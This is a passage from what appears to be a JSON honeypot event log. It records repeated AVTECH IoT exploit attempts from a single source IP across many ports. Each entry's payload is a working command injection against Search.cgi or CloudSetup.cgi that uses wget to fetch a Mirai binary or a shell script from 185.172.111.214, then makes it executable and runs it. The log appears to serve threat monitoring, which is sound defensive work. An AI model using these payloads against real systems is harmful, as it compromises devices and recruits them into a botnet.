8688.       "source_ip_address": "35.193.32.21",
8689.       "country": "US",
8690.       "user_agent": "Snickers-Avtech",
8691.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8692.       "post_data": "",
8693.       "target_port": 8123,
8694.       "protocol": "tcp",
8695.       "tags": [
8696.         {
8697.           "cve": "",
8698.           "category": "IoT",
8699.           "description": "AVTECH Exploit"
8700.         }
8701.       ],
8702.       "event_count": 1,
8703.       "first_seen": "2020-05-31T22:41:57Z",
8704.       "last_seen": "2020-05-31T22:41:57Z"
8705.     },
8706.     {
8707.       "event_id": "3245148ca89bcdf752d490fe0236907983da789805c1ca6023ad6832ab6e659b",
8708.       "source_ip_address": "35.193.32.21",
8709.       "country": "US",
8710.       "user_agent": "Snickers-Avtech",
8711.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8712.       "post_data": "",
8713.       "target_port": 8080,
8714.       "protocol": "tcp",
8715.       "tags": [
8716.         {
8717.           "cve": "",
8718.           "category": "IoT",
8719.           "description": "AVTECH Exploit"
8720.         }
8721.       ],
8722.       "event_count": 1,
8723.       "first_seen": "2020-05-31T22:41:33Z",
8724.       "last_seen": "2020-05-31T22:41:33Z"
8725.     },
8726.     {
8727.       "event_id": "d0d1f57b1a3197c08f131528311bb232723ba93adea40a63a984da7e77914bcb",
8728.       "source_ip_address": "35.193.32.21",
8729.       "country": "US",
8730.       "user_agent": "Snickers-Avtech",
8731.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8732.       "post_data": "",
8733.       "target_port": 8090,
8734.       "protocol": "tcp",
8735.       "tags": [
8736.         {
8737.           "cve": "",
8738.           "category": "IoT",
8739.           "description": "AVTECH Exploit"
8740.         }
8741.       ],
8742.       "event_count": 1,
8743.       "first_seen": "2020-05-31T22:36:40Z",
8744.       "last_seen": "2020-05-31T22:36:40Z"
8745.     },
8746.     {
8747.       "event_id": "5353b6d0d559942c18ab25d36ecaa8f3d2c148dfd8d7bac047e2ed17fe8bd262",
8748.       "source_ip_address": "35.193.32.21",
8749.       "country": "US",
8750.       "user_agent": "Snickers-Avtech",
8751.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8752.       "post_data": "",
8753.       "target_port": 81,
8754.       "protocol": "tcp",
8755.       "tags": [
8756.         {
8757.           "cve": "",
8758.           "category": "IoT",
8759.           "description": "AVTECH Exploit"
8760.         }
8761.       ],
8762.       "event_count": 1,
8763.       "first_seen": "2020-05-31T22:36:08Z",
8764.       "last_seen": "2020-05-31T22:36:08Z"
8765.     },
8766.     {
8767.       "event_id": "e79707e711988acdf33c4a236c8bd5d45a0c08cb0655c670202a758a30493d9f",
8768.       "source_ip_address": "35.193.32.21",
8769.       "country": "US",
8770.       "user_agent": "Snickers-Avtech",
8771.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8772.       "post_data": "",
8773.       "target_port": 5001,
8774.       "protocol": "tcp",
8775.       "tags": [
8776.         {
8777.           "cve": "",
8778.           "category": "IoT",
8779.           "description": "AVTECH Exploit"
8780.         }
8781.       ],
8782.       "event_count": 1,
8783.       "first_seen": "2020-05-31T22:34:34Z",
8784.       "last_seen": "2020-05-31T22:34:34Z"
8785.     },
8786.     {
8787.       "event_id": "e5b557394d3b5b9e7ac0903afd11edec3e9e9517f9190c24518c69c3598e7d9c",
8788.       "source_ip_address": "35.193.32.21",
8789.       "country": "US",
8790.       "user_agent": "Snickers-Avtech",
8791.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8792.       "post_data": "",
8793.       "target_port": 8081,
8794.       "protocol": "tcp",
8795.       "tags": [
8796.         {
8797.           "cve": "",
8798.           "category": "IoT",
8799.           "description": "AVTECH Exploit"
8800.         }
8801.       ],
8802.       "event_count": 1,
8803.       "first_seen": "2020-05-31T22:34:33Z",
8804.       "last_seen": "2020-05-31T22:34:33Z"
8805.     },
8806.     {
8807.       "event_id": "e028406198cd8080422d566a64ce9ad003f6845f18514016598ccd61804856bc",
8808.       "source_ip_address": "35.193.32.21",
8809.       "country": "US",
8810.       "user_agent": "Snickers-Avtech",
8811.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8812.       "post_data": "",
8813.       "target_port": 443,
8814.       "protocol": "tcp",
8815.       "tags": [
8816.         {
8817.           "cve": "",
8818.           "category": "IoT",
8819.           "description": "AVTECH Exploit"
8820.         }
8821.       ],
8822.       "event_count": 1,
8823.       "first_seen": "2020-05-31T22:34:32Z",
8824.       "last_seen": "2020-05-31T22:34:32Z"
8825.     },
8826.     {
8827.       "event_id": "07529c2c9afff0b522c18e7e82d79e90b2aa239472ad0481293dedaad96e8ac8",
8828.       "source_ip_address": "35.193.32.21",
8829.       "country": "US",
8830.       "user_agent": "Snickers-Avtech",
8831.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
8832.       "post_data": "",
8833.       "target_port": 9002,
8834.       "protocol": "tcp",
8835.       "tags": [
8836.         {
8837.           "cve": "",
8838.           "category": "IoT",
8839.           "description": "AVTECH Exploit"
8840.         }
8841.       ],
8842.       "event_count": 1,
8843.       "first_seen": "2020-05-31T22:32:16Z",
8844.       "last_seen": "2020-05-31T22:32:16Z"
8845.     },
8846.     {
8847.       "event_id": "32290f8e5e2167539bd330614a25f2720b100b4099d0d82571d22f16346a6e38",
8848.       "source_ip_address": "35.193.32.21",
8849.       "country": "US",
8850.       "user_agent": "Snickers-Avtech",
8851.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8852.       "post_data": "",
8853.       "target_port": 9002,
8854.       "protocol": "tcp",
8855.       "tags": [
8856.         {
8857.           "cve": "",
8858.           "category": "IoT",
8859.           "description": "AVTECH Exploit"
8860.         }
8861.       ],
8862.       "event_count": 1,
8863.       "first_seen": "2020-05-31T22:32:14Z",
8864.       "last_seen": "2020-05-31T22:32:14Z"
8865.     },
8866.     {
8867.       "event_id": "9b06204a239cea17fd141231dd2899c674569fc57fcfa62af4506b6a81f26bdb",
8868.       "source_ip_address": "35.193.32.21",
8869.       "country": "US",
8870.       "user_agent": "Snickers-Avtech",
8871.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
8872.       "post_data": "",
8873.       "target_port": 7001,
8874.       "protocol": "tcp",
8875.       "tags": [
8876.         {
8877.           "cve": "",
8878.           "category": "IoT",
8879.           "description": "AVTECH Exploit"
8880.         }
8881.       ],
8882.       "event_count": 1,
8883.       "first_seen": "2020-05-31T22:32:14Z",
8884.       "last_seen": "2020-05-31T22:32:14Z"
8885.     },
8886.     {
8887.       "event_id": "da1a8ff154caced69819fb29632c2b907b66ebbafc6705e3b8956c6188244b50",
8888.       "source_ip_address": "35.193.32.21",
8889.       "country": "US",
8890.       "user_agent": "Snickers-Avtech",
8891.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8892.       "post_data": "",
8893.       "target_port": 7001,
8894.       "protocol": "tcp",
8895.       "tags": [
8896.         {
8897.           "cve": "",
8898.           "category": "IoT",
8899.           "description": "AVTECH Exploit"
8900.         }
8901.       ],
8902.       "event_count": 1,
8903.       "first_seen": "2020-05-31T22:32:12Z",
8904.       "last_seen": "2020-05-31T22:32:12Z"
8905.     },
8906.     {
8907.       "event_id": "13fc91df1b619b99b85c706647294b6dc8aab8de96ecfc7fafcdd98f879856d5",
8908.       "source_ip_address": "35.193.32.21",
8909.       "country": "US",
8910.       "user_agent": "Snickers-Avtech",
8911.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
8912.       "post_data": "",
8913.       "target_port": 9200,
8914.       "protocol": "tcp",
8915.       "tags": [
8916.         {
8917.           "cve": "",
8918.           "category": "IoT",
8919.           "description": "AVTECH Exploit"
8920.         }
8921.       ],
8922.       "event_count": 1,
8923.       "first_seen": "2020-05-31T22:32:11Z",
8924.       "last_seen": "2020-05-31T22:32:11Z"
8925.     },
8926.     {
8927.       "event_id": "8409293b21cd4abb3efd5248df7fd7010a528e00386a5356157090ead425c922",
8928.       "source_ip_address": "35.193.32.21",
8929.       "country": "US",
8930.       "user_agent": "Snickers-Avtech",
8931.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8932.       "post_data": "",
8933.       "target_port": 9200,
8934.       "protocol": "tcp",
8935.       "tags": [
8936.         {
8937.           "cve": "",
8938.           "category": "IoT",
8939.           "description": "AVTECH Exploit"
8940.         }
8941.       ],
8942.       "event_count": 1,
8943.       "first_seen": "2020-05-31T22:32:09Z",
8944.       "last_seen": "2020-05-31T22:32:09Z"
8945.     },
8946.     {
8947.       "event_id": "143e6797e93b92aaf3ae0407a05efa52e7c8392d7f89560df55f1b5fbf3f4864",
8948.       "source_ip_address": "35.193.32.21",
8949.       "country": "US",
8950.       "user_agent": "Snickers-Avtech",
8951.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
8952.       "post_data": "",
8953.       "target_port": 8443,
8954.       "protocol": "tcp",
8955.       "tags": [
8956.         {
8957.           "cve": "",
8958.           "category": "IoT",
8959.           "description": "AVTECH Exploit"
8960.         }
8961.       ],
8962.       "event_count": 2,
8963.       "first_seen": "2020-05-31T22:20:21Z",
8964.       "last_seen": "2020-05-31T22:21:03Z"
8965.     },
8966.     {
8967.       "event_id": "8c9257fa8a1b89512928dc2be910370fe4bfc9d5d7a86dced2a5d222a3e0f939",
8968.       "source_ip_address": "35.193.32.21",
8969.       "country": "US",
8970.       "user_agent": "Snickers-Avtech",
8971.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
8972.       "post_data": "",
8973.       "target_port": 5001,
8974.       "protocol": "tcp",
8975.       "tags": [
8976.         {
8977.           "cve": "",
8978.           "category": "IoT",
8979.           "description": "AVTECH Exploit"
8980.         }
8981.       ],
8982.       "event_count": 1,
8983.       "first_seen": "2020-05-31T22:21:03Z",
8984.       "last_seen": "2020-05-31T22:21:03Z"
8985.     },
8986.     {
8987.       "event_id": "0e28e4547bf1a76ff740efeef026095701fe8cfc8873c053ba7d2b26623513f8",
8988.       "source_ip_address": "35.193.32.21",
8989.       "country": "US",
8990.       "user_agent": "Snickers-Avtech",
8991.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
8992.       "post_data": "",
8993.       "target_port": 5001,
8994.       "protocol": "tcp",
8995.       "tags": [
8996.         {
8997.           "cve": "",
8998.           "category": "IoT",
8999.           "description": "AVTECH Exploit"
9000.         }
9001.       ],
9002.       "event_count": 1,
9003.       "first_seen": "2020-05-31T22:21:01Z",
9004.       "last_seen": "2020-05-31T22:21:01Z"
9005.     },
9006.     {
9007.       "event_id": "7dd0c2454dde917a3ff653d5d0da5acb696b6b0b130bec002c27265f4d365de5",
9008.       "source_ip_address": "35.193.32.21",
9009.       "country": "US",
9010.       "user_agent": "Snickers-Avtech",
9011.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
9012.       "post_data": "",
9013.       "target_port": 8443,
9014.       "protocol": "tcp",
9015.       "tags": [
9016.         {
9017.           "cve": "",
9018.           "category": "IoT",
9019.           "description": "AVTECH Exploit"
9020.         }
9021.       ],
9022.       "event_count": 2,
9023.       "first_seen": "2020-05-31T22:20:19Z",
9024.       "last_seen": "2020-05-31T22:21:00Z"
9025.     },
9026.     {
9027.       "event_id": "74be63f36d924dd52786ea0de65f0c4117e822b019f1d117312bfda3a486ae7c",
9028.       "source_ip_address": "35.193.32.21",
9029.       "country": "US",
9030.       "user_agent": "Snickers-Avtech",
9031.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
9032.       "post_data": "",
9033.       "target_port": 9002,
9034.       "protocol": "tcp",
9035.       "tags": [
9036.         {
9037.           "cve": "",
9038.           "category": "IoT",
9039.           "description": "AVTECH Exploit"
9040.         }
9041.       ],
9042.       "event_count": 1,
9043.       "first_seen": "2020-05-31T22:20:50Z",
9044.       "last_seen": "2020-05-31T22:20:50Z"
9045.     },
9046.     {
9047.       "event_id": "fd487e15f43a01a70c65b7ebafe96f333c316c33d33d1a81ea4974eb95c8df56",
9048.       "source_ip_address": "35.193.32.21",
9049.       "country": "US",
9050.       "user_agent": "Snickers-Avtech",
9051.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
9052.       "post_data": "",
9053.       "target_port": 9002,
9054.       "protocol": "tcp",
9055.       "tags": [
9056.         {
9057.           "cve": "",
9058.           "category": "IoT",
9059.           "description": "AVTECH Exploit"
9060.         }
9061.       ],
9062.       "event_count": 1,
9063.       "first_seen": "2020-05-31T22:20:48Z",
9064.       "last_seen": "2020-05-31T22:20:48Z"
9065.     },
9066.     {
9067.       "event_id": "47293ed0d8ca3a65dbbe0e3881c66a0c7df34ab168dfb8fbdcb41697353d9bf0",
9068.       "source_ip_address": "35.193.32.21",
9069.       "country": "US",
9070.       "user_agent": "Snickers-Avtech",
9071.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
9072.       "post_data": "",
9073.       "target_port": 7001,
9074.       "protocol": "tcp",
9075.       "tags": [
9076.         {
9077.           "cve": "",
9078.           "category": "IoT",
9079.           "description": "AVTECH Exploit"
9080.         }
9081.       ],
9082.       "event_count": 1,
9083.       "first_seen": "2020-05-31T22:20:48Z",
9084.       "last_seen": "2020-05-31T22:20:48Z"
9085.     },
9086.     {
9087.       "event_id": "3afe48a5af4ab6a21642118655c58f6d84b53e13dd9a936185636795999ea2e7",
9088.       "source_ip_address": "35.193.32.21",
9089.       "country": "US",
9090.       "user_agent": "Snickers-Avtech",
9091.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
9092.       "post_data": "",
9093.       "target_port": 7001,
9094.       "protocol": "tcp",
9095.       "tags": [
9096.         {
9097.           "cve": "",
9098.           "category": "IoT",
9099.           "description": "AVTECH Exploit"
9100.         }
9101.       ],
9102.       "event_count": 1,
9103.       "first_seen": "2020-05-31T22:20:46Z",
9104.       "last_seen": "2020-05-31T22:20:46Z"
9105.     },
9106.     {
9107.       "event_id": "bb1bacc8252a1bbed71f36c5fd2ee45251f6c7848cce393b88ab2db77e3f913a",
9108.       "source_ip_address": "35.193.32.21",
9109.       "country": "US",
9110.       "user_agent": "Snickers-Avtech",
9111.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
9112.       "post_data": "",
9113.       "target_port": 9200,
9114.       "protocol": "tcp",
9115.       "tags": [
9116.         {
9117.           "cve": "",
9118.           "category": "IoT",
9119.           "description": "AVTECH Exploit"
9120.         }
9121.       ],
9122.       "event_count": 1,
9123.       "first_seen": "2020-05-31T22:20:45Z",
9124.       "last_seen": "2020-05-31T22:20:45Z"
9125.     },
9126.     {
9127.       "event_id": "7498009199f529cb056c79e62ab1316704321e00daa7ab8a126fc15ae9f55188",
9128.       "source_ip_address": "35.193.32.21",
9129.       "country": "US",
9130.       "user_agent": "Snickers-Avtech",
9131.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
9132.       "post_data": "",
9133.       "target_port": 9200,
9134.       "protocol": "tcp",
9135.       "tags": [
9136.         {
9137.           "cve": "",
9138.           "category": "IoT",
9139.           "description": "AVTECH Exploit"
9140.         }
9141.       ],
9142.       "event_count": 1,
9143.       "first_seen": "2020-05-31T22:20:43Z",
9144.       "last_seen": "2020-05-31T22:20:43Z"
9145.     },
9146.     {
9147.       "event_id": "4e16c663e029d42916569db19460da949ab79e817219f7ccd61bc266308cc8eb",
9148.       "source_ip_address": "35.193.32.21",
9149.       "country": "US",
9150.       "user_agent": "Snickers-Avtech",
9151.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
9152.       "post_data": "",
9153.       "target_port": 9002,
9154.       "protocol": "tcp",
9155.       "tags": [
9156.         {
9157.           "cve": "",
9158.           "category": "IoT",
9159.           "description": "AVTECH Exploit"
9160.         }
9161.       ],
9162.       "event_count": 1,
9163.       "first_seen": "2020-05-31T22:19:01Z",
9164.       "last_seen": "2020-05-31T22:19:01Z"
9165.     },
9166.     {
9167.       "event_id": "55262234c050de544f91fa927c99b8799b0f73daebf7235b6f99db4a190fa8c8",
9168.       "source_ip_address": "35.193.32.21",
9169.       "country": "US",
9170.       "user_agent": "Snickers-Avtech",
9171.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
9172.       "post_data": "",
9173.       "target_port": 9002,
9174.       "protocol": "tcp",
9175.       "tags": [
9176.         {
9177.           "cve": "",
9178.           "category": "IoT",
9179.           "description": "AVTECH Exploit"
9180.         }
9181.       ],
9182.       "event_count": 1,
9183.       "first_seen": "2020-05-31T22:18:59Z",
9184.       "last_seen": "2020-05-31T22:18:59Z"
9185.     },
9186.     {
9187.       "event_id": "09b4d953a8c2c359d5e7c8ec442459cb7f060389aa480675dd700e930467aacc",
9188.       "source_ip_address": "35.193.32.21",
9189.       "country": "US",
9190.       "user_agent": "Snickers-Avtech",
9191.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
9192.       "post_data": "",
9193.       "target_port": 7001,
9194.       "protocol": "tcp",
9195.       "tags": [
9196.         {
9197.           "cve": "",
9198.           "category": "IoT",
9199.           "description": "AVTECH Exploit"
9200.         }
9201.       ],
9202.       "event_count": 1,
9203.       "first_seen": "2020-05-31T22:18:59Z",
9204.       "last_seen": "2020-05-31T22:18:59Z"
9205.     },
9206.     {
9207.       "event_id": "13e4953ba65621eede2422b1443ba73fffe4b7c49ef4f493cfa2e5881619aec9",
9208.       "source_ip_address": "35.193.32.21",
9209.       "country": "US",
9210.       "user_agent": "Snickers-Avtech",
9211.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
9212.       "post_data": "",
9213.       "target_port": 7001,
9214.       "protocol": "tcp",
9215.       "tags": [
9216.         {
9217.           "cve": "",
9218.           "category": "IoT",
9219.           "description": "AVTECH Exploit"
9220.         }
9221.       ],
9222.       "event_count": 1,
9223.       "first_seen": "2020-05-31T22:18:57Z",
9224.       "last_seen": "2020-05-31T22:18:57Z"
9225.     },
9226.     {
9227.       "event_id": "c16c984b9847c43eb3f95169cf3d440a59f99fb1802d09e4afb9efe121fbd94c",
9228.       "source_ip_address": "35.193.32.21",
9229.       "country": "US",
9230.       "user_agent": "Snickers-Avtech",
9231.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
9232.       "post_data": "",
9233.       "target_port": 9200,
9234.       "protocol": "tcp",
9235.       "tags": [
9236.         {
9237.           "cve": "",
9238.           "category": "IoT",
9239.           "description": "AVTECH Exploit"
9240.         }
9241.       ],
9242.       "event_count": 1,
9243.       "first_seen": "2020-05-31T22:18:56Z",
9244.       "last_seen": "2020-05-31T22:18:56Z"
9245.     },
9246.     {
9247.       "event_id": "4da5f0ebeb3bab363c6115a19002234fc85ce0a7d05a156282d2788d17d7e3b3",
9248.       "source_ip_address": "35.193.32.21",
9249.       "country": "US",
9250.       "user_agent": "Snickers-Avtech",
9251.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
9252.       "post_data": "",
9253.       "target_port": 9200,
9254.       "protocol": "tcp",
9255.       "tags": [
9256.         {
9257.           "cve": "",
9258.           "category": "IoT",
9259.           "description": "AVTECH Exploit"
9260.         }
9261.       ],
9262.       "event_count": 1,
9263.       "first_seen": "2020-05-31T22:18:53Z",
9264.       "last_seen": "2020-05-31T22:18:53Z"
9265.     },
9266.     {
9267.       "event_id": "5ba382e0fff1fa8862d5b668a799c0925a08407bee58f4aa22de509644c1d17c",
9268.       "source_ip_address": "35.193.32.21",
9269.       "country": "US",
9270.       "user_agent": "Snickers-Avtech",
9271.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
9272.       "post_data": "",
9273.       "target_port": 8443,
9274.       "protocol": "tcp",
9275.       "tags": [
9276.         {
9277.           "cve": "",
9278.           "category": "IoT",
9279.           "description": "AVTECH Exploit"
9280.         }
9281.       ],
9282.       "event_count": 1,
9283.       "first_seen": "2020-05-31T22:18:32Z",
9284.       "last_seen": "2020-05-31T22:18:32Z"
9285.     },
9286.     {
9287.       "event_id": "e7b440e5a5951210ffbaa23c70a72840a15dd87ce03d065eb0340fad311a4f93",
9288.       "source_ip_address": "35.193.32.21",
9289.       "country": "US",
9290.       "user_agent": "Snickers-Avtech",
9291.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
9292.       "post_data": "",
9293.       "target_port": 8443,
9294.       "protocol": "tcp",
9295.       "tags": [
9296.         {
9297.           "cve": "",
9298.           "category": "IoT",
9299.           "description": "AVTECH Exploit"
9300.         }
9301.       ],
9302.       "event_count": 1,
9303.       "first_seen": "2020-05-31T22:18:30Z",
9304.       "last_seen": "2020-05-31T22:18:30Z"
9305.     },
9306.     {
9307.       "event_id": "f2ca870107be30b15d44bd315f7d3b66333f9276659ed25bca7f8900d05362ab",
9308.       "source_ip_address": "35.193.32.21",
9309.       "country": "US",
9310.       "user_agent": "Snickers-Avtech",
9311.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
9312.       "post_data": "",
9313.       "target_port": 9000,
9314.       "protocol": "tcp",
9315.       "tags": [
9316.         {
9317.           "cve": "",
9318.           "category": "IoT",
9319.           "description": "AVTECH Exploit"
9320.         }
9321.       ],
9322.       "event_count": 1,
9323.       "first_seen": "2020-05-31T21:59:11Z",
9324.       "last_seen": "2020-05-31T21:59:11Z"
9325.     },
9326.     {
9327.       "event_id": "2f9f9802964b01eff8176aa2fd2b906704903c7e021969e6316d7b55fd1588ac",
9328.       "source_ip_address": "35.193.32.21",
9329.       "country": "US",
9330.       "user_agent": "Snickers-Avtech",
9331.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh w00dy.botsh)&password=admin HTTP/1.1",
9332.       "post_data": "",
9333.       "target_port": 8181,
